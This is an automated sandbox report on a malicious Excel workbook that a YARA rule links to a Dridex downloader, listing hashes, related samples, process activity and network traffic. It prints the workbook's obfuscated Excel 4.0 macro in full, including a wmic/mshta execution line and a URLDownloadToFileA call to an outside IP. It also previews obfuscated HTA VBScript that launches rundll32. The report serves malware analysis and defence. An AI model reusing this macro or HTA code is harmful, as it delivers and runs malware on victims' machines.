• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

Time | Type | Description
12:47:21 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
12:47:24 | API Interceptor | 1x Sleep call for process: mshta.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

Match: 136.144.181.174

Associated Sample Name / URL | Detection
invoice.xlsb | malicious
invoice.xlsb | malicious
license-08084746.xlsb | malicious
license-08084746.xlsb | malicious
hunt25640035.xlsb | malicious
hunt25640035.xlsb | malicious
Sale-8799306.xlsb | malicious
03332955311591163552.xlsb | malicious
license517502.xlsb | malicious
03332955311591163552.xlsb | malicious
license517502.xlsb | malicious
942830.xlsb | malicious
promo code83874071.xlsb | malicious
promo code83874071.xlsb | malicious
vote number3210109.xlsb | malicious
tax77567960.xlsb | malicious
hunting license-25331.xlsb | malicious
vote number3210109.xlsb | malicious
tax77567960.xlsb | malicious

                                                                                                                                                                                          Domains

                                                                                                                                                                                          No context

                                                                                                                                                                                          ASN

Match: TRANSIP-AS Amsterdam, the Netherlands, NL

Associated Sample Name / URL | Detection | Context
request-0132311.xlsb | malicious | 136.144.181.174
invoice.xlsb | malicious | 136.144.181.174
invoice.xlsb | malicious | 136.144.181.174
license-08084746.xlsb | malicious | 136.144.181.174
license-08084746.xlsb | malicious | 136.144.181.174
hunt25640035.xlsb | malicious | 136.144.181.174
hunt25640035.xlsb | malicious | 136.144.181.174
Sale-8799306.xlsb | malicious | 136.144.181.174
03332955311591163552.xlsb | malicious | 136.144.181.174
license517502.xlsb | malicious | 136.144.181.174
03332955311591163552.xlsb | malicious | 136.144.181.174
license517502.xlsb | malicious | 136.144.181.174
942830.xlsb | malicious | 136.144.181.174
promo code83874071.xlsb | malicious | 136.144.181.174
promo code83874071.xlsb | malicious | 136.144.181.174
vote number3210109.xlsb | malicious | 136.144.181.174
tax77567960.xlsb | malicious | 136.144.181.174
hunting license-25331.xlsb | malicious |
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174
                                                                                                                                                                                          tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                          • 136.144.181.174

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\vULADISfrveNTj.rtf
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 4804
Entropy (8bit): 5.059292049596848
Encrypted: false
SSDEEP: 96:FdBjMAD8mQfTZYgZAO1HV9gboHzKJAuA4dEbA:FdBjMK8mMNpZnPgA74dsA
MD5: 3774BB5E5C7846AD84A463FFDEA4D2DC
SHA1: 0A7FAEF6AD785E16555BD4577D6446A10C7E68D7
SHA-256: 6CFC58E1AE811CB8DF59B5E26F85FF4D8C1956C3F64C8AF4929EC4CA6FF03724
SHA-512: DC6C317D548523109352F838A868905548E539CC6CDFEC565F92B40B3DA6EEE794A4EBBC7E42FF27941AA44530CD28024E375DC66961F6DC97C1966E7CDCF3B2
Malicious: true
Yara Hits:
• Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\vULADISfrveNTj.rtf, Author: Joe Security
Reputation: low
Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..Y_j_a_I_Y_w_k_c_G_z = Chr(114+1-1) & "und" & "ll" & "32." & "" & Chr(101+1-1) & Chr(120+1-1) & "e " & "" & "C:\" & "\Pr" & Chr(111+1-1) & "gra" & "mDa" & "ta\" & "qqn" & Chr(105+1-1) & "gge" & Chr(114+1-1) & Chr(46+1-1) & "" & "bi" & "n " & Chr(68+1-1) & "ll" & Chr(82+1-1) & Chr(101+1-1) & "gis" & "" & "ter" & "Ser" & "ver"..Set g_J_u_G_E_n_b_k_q_b_u = CreateObject("MSX" & Chr(77+1-1) & "" & "L2." & "Ser" & Chr(118+1-1) & "er" & "" & "XML" & "HT" & "" & "TP" & ".6." & Chr(48+1-1))....Y_a_l_U_C_F_c_R_W = "" & Chr(87+1-1) & Chr(115+1-1) & "cr" & "ip" & "" & Chr(116+1-1) & Chr(46+1-1) & Chr(83+1-1) & "" & "" & "hel" & "" & Chr(108+1-1)..Set l_A_o_J_e_o_G_Y_F_p_O_E_f = CreateObject(Y_a_l_U_C_F_c_R_W)..v_G_M_X_r_X_x_a = LCase(l_A_o_J_e_o_G_Y_F_p
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 140163
Entropy (8bit): 5.35816822090864
Encrypted: false
SSDEEP: 1536:tcQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:3uQ9DQW+zJXfH
MD5: 07409DFAC5671F0716042B4F6AD0E465
SHA1: 5C3A8B1CA34370D50D2311EAF5336B01A538B94A
SHA-256: AD272185462BDC7E3DF06D6B8FF7CBB549E37DF725911F38CC9310A66CC87E7C
SHA-512: CAE40AA3C29A765D25D580B68487E7C188750A58197D4F1CD3767D3C1D99292A2A7A6E7262801A3836601BBFDA01C60C758B9C81B3EF33705C93C49D3E043BA0
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-25T11:46:28">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3DD64742.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 284 x 58, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 2295
Entropy (8bit): 7.858135112374714
Encrypted: false
SSDEEP: 48:i5s85s+Q/U3ePlmmGUzUr52d2VPmRatEBSNHeUD4OCRdDJAq5s85s85sf:hr+n3dMzUr5zVOEeBseUdo6rrf
MD5: 6ADAECE7AB0ED8730E76534572A1A658
SHA1: 8AC129DA4A48859EF0D28C7B1AC9662069CCDBF5
SHA-256: 4569E40F2046D8D63AAC30331F8D407EA2AB664EA9EF3A270CB7BD99C9749BD0
SHA-512: 7607D0ACE96C520B59313DF7BB179FF8720B511AA0ED45CF177333C6B89B428C25C4F9CD9F481C9F5C55F81B90D6DE06C531893BCC4889F254A29B23F31A4450
Malicious: false
Reputation: low
Preview: .PNG........IHDR.......:.......q(....IDATx...{PSW...o.$.(AT".Hx......n.>+..G\w...v\..ci}..ujuk;vfu......H).X.HQ@...$<..K....$..;....D;;...3..srr..s.A.w.t.B..?......BE.g.*B8.P.......(T.pF.".3..!.Q...BE.g.*B8.P.......(T.pF.".3..!.Q...BE.g.*B8.P.......\......g...z..........2.....j.X*....V....b...M}.0......08q...-o].*......gv.....yp.....@...RQ.H,.......P....fu../.......w.W.....".c7...d.{W{....a.Z3`..M...Z......].VG.L.u..r....if.I8a..\...U'R.-;t !~.....q...T.Y...........p.T...Y[t...1Be..9....1A......Db1......\.x.._D.$..\.RWww..=..u...?l;....6........%.sd..R.OhH......xy...q...{..&..Sf...s=[3\......b....Y..F...7.......r.3T..l{.I./......@..7!..E.I"Q..B....M....'.9..83>.."..h.T..PS.t.J.V..[.:.......[........p..;0 i....I...<.t.g..q.r.3...}#..l{c.D.w`@.%.........qY.L_....Ty...fo......,0p.......5.;..0..)3...>.......z...3..7|.....n....i...;.`..a5].V.2v...Tj......n...&DE..;.@.....3X[.h..c..e...l...kgU.I..Q.R....Fv........8..--M......V.D.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\79B7EA5B.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 224 x 317, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 47905
Entropy (8bit): 7.975097307731708
Encrypted: false
SSDEEP: 768:oPiBEX9M11Q3TUZg7EZ52/ViBN3SH8WsqnxyZI1FLyGuH32MRbYgB1ZQ0ZoKABAG:oPrX6Q3cWViBN3yKqxyeHw3vRMgF3oK+
MD5: 3773A459C89CC2480156FE604D3C5A5D
SHA1: 3E2C5867A9670C6FDF65C156FDF6DE7F0A43A018
SHA-256: 96E1EF7E454640575D72ED2B6C16843E44AEDF3BB6C47513DF78E4679CF4881F
SHA-512: 82383A4DF8ADF2A8521214993112D238BB72792BDB078B0BFE6CDD5CE16F5CA5305BB4ED162F0F0749C3A5EAB5CB929BD1E4B50360A02F13A58593514FAA51E7
Malicious: false
Reputation: moderate, very likely benign file
Preview: .PNG........IHDR.......=.......n....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
C:\Users\user\Desktop\~$request-0132311.xlsb
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.6081032063576088
Encrypted: false
SSDEEP: 3:RFXI6dtt:RJ1
MD5: 7AB76C81182111AC93ACF915CA8331D5
SHA1: 68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256: 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512: A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious: true
Reputation: high, very likely benign file
Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
\Device\ConDrv
Process: C:\Windows\SysWOW64\wbem\WMIC.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 160
Entropy (8bit): 5.095703110114614
Encrypted: false
SSDEEP: 3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmsdeoO6JQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egmsdNeF
MD5: 180ADFE5A9846ADE966B75140ED563E7
SHA1: 9B24C0BA0DCAB30DF912245903442DCD83DA8BC6
SHA-256: 237E3A28614E2E406550D3394C61825EABCE4DB4846532F4922C68862953D6C0
SHA-512: 52A157BF3991627CE3E1FB2169EA8878C5CFA2723A1C6C9F0883AD4F2955E6D81626805324228F45464C8EF13B9B1EFF91E50569F80F3B746849B74D66AEE686
Malicious: false
Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4988;...ReturnValue = 0;..};....

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.899514909773616
TrID:
• Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
• Microsoft Excel Office Binary workbook document (40504/1) 29.03%
• Excel Microsoft Office Open XML Format document (40004/1) 28.67%
• ZIP compressed archive (8000/1) 5.73%
File name: request-0132311.xlsb
File size: 79110
MD5: 1479f6bfc2c47932d8eee6cf4db5c7f4
SHA1: 7594bd2fb1fa9005662ece3c490fe80d28463e2c
SHA256: 38e36a6b7bf101f5a8ddfb13756b8975413c91bad1828f83258afa6e564f1c32
SHA512: 3061711696e16620779bb9120c40657f508ba4820ed69a520a227e2f4c1ba69826ba92640c24f14c4086ac7bd2c183f1881308d3c21120311c44a83f8fb349f7
SSDEEP: 1536:UWJPrX6Q3cWViBN3yKqxyeHw3vRMgF3oKy5h8HXv6Dyrirr1gdd:VVqmc3/q0dfaguKygXvYyrirr1gdd
File Content Preview: PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash: 74f0d0d2c6d6d0f4

                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Document Type:OpenXML
                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                          OLE File "request-0132311.xlsb"

                                                                                                                                                                                          Indicators

                                                                                                                                                                                          Has Summary Info:
                                                                                                                                                                                          Application Name:
                                                                                                                                                                                          Encrypted Document:
                                                                                                                                                                                          Contains Word Document Stream:
                                                                                                                                                                                          Contains Workbook/Book Stream:
                                                                                                                                                                                          Contains PowerPoint Document Stream:
                                                                                                                                                                                          Contains Visio Document Stream:
                                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                                          Contains VBA Macros:

                                                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                                                          0,564,=FOPEN("C:\Pro" & CHAR(103) & "ra" & CHAR(109) & CHAR(68) & CHAR(97) & "ta\vULADISfrveNTj.rt" & CHAR(102), 3)
                                                                                                                                                                                          1,564,=C5835+A7213
                                                                                                                                                                                          3,564,=B8446+B2178
                                                                                                                                                                                          4,564,=A8517+B1384
                                                                                                                                                                                          10,564,=C1152+C6066
                                                                                                                                                                                          13,564,=FOR.CELL("SeXLCYfeLdqaYT",Sheet1!CH170:CK1370, TRUE)
                                                                                                                                                                                          14,564,=D3171+A2702
                                                                                                                                                                                          15,564,=C1615+D4355
                                                                                                                                                                                          17,564,=B6324+B7098
                                                                                                                                                                                          18,564,=D2084+C923
                                                                                                                                                                                          19,564,=B8680+B595
                                                                                                                                                                                          22,564,=C8358+A7087
                                                                                                                                                                                          23,564,=A3086+C7272
                                                                                                                                                                                          25,564,=B1110+D1197
                                                                                                                                                                                          27,564,=A1928+C2040
                                                                                                                                                                                          28,564,=FWRITE(0,CHAR(SeXLCYfeLdqaYT))
                                                                                                                                                                                          32,564,=C4578+D7477
                                                                                                                                                                                          33,564,=C8320+B1422
                                                                                                                                                                                          35,564,=A8605+A5601
                                                                                                                                                                                          36,564,=C9013+D8034
                                                                                                                                                                                          37,564,=D457+A1230
                                                                                                                                                                                          42,564,=NEXT()
                                                                                                                                                                                          44,564,=A4174+C8463
                                                                                                                                                                                          45,564,=C8491+B4568
                                                                                                                                                                                          49,564,=B9406+B2655
                                                                                                                                                                                          50,564,=C2298+D8440
                                                                                                                                                                                          51,564,=A5216+A6909
                                                                                                                                                                                          52,564,=A8663+D6737
                                                                                                                                                                                          54,564,=A5799+B6026
                                                                                                                                                                                          57,564,=EXEC(CHAR(119) & "mic proc" & CHAR(101) & "ss call" & CHAR(32) & "create" & CHAR(32) & CHAR(34) & "mshta C:\Progr" & CHAR(97) & "mData\vULADISfr" & CHAR(118) & "eNTj.r" & CHAR(116) & CHAR(102) & "" & CHAR(34) & "")
                                                                                                                                                                                          60,564,=D7139+C814
                                                                                                                                                                                          61,564,=D240+B4681
                                                                                                                                                                                          62,564,=A1760+A9875
                                                                                                                                                                                          63,564,=D6796+A3632
                                                                                                                                                                                          64,564,=A4005+D9807
                                                                                                                                                                                          66,564,=A6544+B7529
                                                                                                                                                                                          67,564,=C4170+D5127
                                                                                                                                                                                          69,564,=B4234+D2646
                                                                                                                                                                                          71,564,=CALL("urlmo" & CHAR(110), "URLDownloadTo" & CHAR(70) & "ileA","" & CHAR(74) & "JCCJJ", 0, CHAR(104) & "ttp" & CHAR(58) & "//" & CHAR(49) & CHAR(51) & "6.144." & CHAR(49) & "81" & CHAR(46) & "174:8" & CHAR(48) & "80/Q2" & CHAR(87) & "5VWUFL5VCMQ7" & CHAR(74) & "QPETG3CC" & CHAR(84) & "YX72Z4R25" & CHAR(80) & CHAR(68) & CHAR(71), "C:" & CHAR(92) & CHAR(80) & "rogra" & CHAR(109) & "Data\vDgIskgmrTd" & CHAR(69) & "Ub.txt",0,0)
                                                                                                                                                                                          73,564,=C5537+D9236
                                                                                                                                                                                          74,564,=D6643+A1071
                                                                                                                                                                                          76,564,=A7092+A3312
                                                                                                                                                                                          78,564,=A8313+D7781
                                                                                                                                                                                          80,564,=A3250+A508
                                                                                                                                                                                          84,564,=A5147+C8759
                                                                                                                                                                                          85,564,=ALERT(CHAR(69) & "rr" & CHAR(111) & CHAR(114) & "! Send" & CHAR(105) & CHAR(110) & "g rep" & CHAR(111) & "rt to " & CHAR(77) & CHAR(105) & "croso" & CHAR(102) & "t." & CHAR(46) & CHAR(46))
                                                                                                                                                                                          90,564,=A3353+B8550
                                                                                                                                                                                          91,564,=B6248+B2087
                                                                                                                                                                                          92,564,=A3036+D8832
                                                                                                                                                                                          93,564,=B7866+B1376
                                                                                                                                                                                          95,564,=A934+B7296
                                                                                                                                                                                          96,564,=B6168+A5688
                                                                                                                                                                                          99,564,=A5209+B6172
                                                                                                                                                                                          100,564,=FOPEN("C:\ProgramD" & CHAR(97) & "ta\vDgIskgmrTdEUb.txt",1)
                                                                                                                                                                                          103,564,=B5787+C5048
                                                                                                                                                                                          105,564,=D8579+C5977
                                                                                                                                                                                          106,564,=C9647+A9367
                                                                                                                                                                                          109,564,=A2240+D8397
                                                                                                                                                                                          110,564,=C5153+C3092
                                                                                                                                                                                          111,564,=B4256+A5032
                                                                                                                                                                                          113,564,=D8071+C3585
                                                                                                                                                                                          114,564,=SEND.MAIL(EVALUATE(FREAD(US101,255)))
                                                                                                                                                                                          116,564,=D9781+C238
                                                                                                                                                                                          117,564,=D1056+D7962
                                                                                                                                                                                          119,564,=B4585+A2967
                                                                                                                                                                                          121,564,=D2821+D381
                                                                                                                                                                                          122,564,=B7198+C7967
                                                                                                                                                                                          123,564,=D1203+C6661
                                                                                                                                                                                          125,564,=A9399+B611
                                                                                                                                                                                          126,564,=B2222+D7652
                                                                                                                                                                                          129,564,=RETURN()
                                                                                                                                                                                          

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 25, 2021 12:47:21.358192921 CET  49781        8080       192.168.2.5      136.144.181.174
Nov 25, 2021 12:47:21.385868073 CET  8080         49781      136.144.181.174  192.168.2.5
Nov 25, 2021 12:47:21.970773935 CET  49781        8080       192.168.2.5      136.144.181.174
Nov 25, 2021 12:47:21.998359919 CET  8080         49781      136.144.181.174  192.168.2.5
Nov 25, 2021 12:47:22.658227921 CET  49781        8080       192.168.2.5      136.144.181.174
Nov 25, 2021 12:47:22.685894012 CET  8080         49781      136.144.181.174  192.168.2.5

                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:12:46:26
                                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                          Imagebase:0xda0000
                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:12:47:20
                                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                          File size:391680 bytes
                                                                                                                                                                                          MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                          Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:12:47:21
Start date:25/11/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:12:47:22
Start date:25/11/2021
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta C:\ProgramData\vULADISfrveNTj.rtf
Imagebase:0x7ff7fcdb0000
File size:14848 bytes
MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis
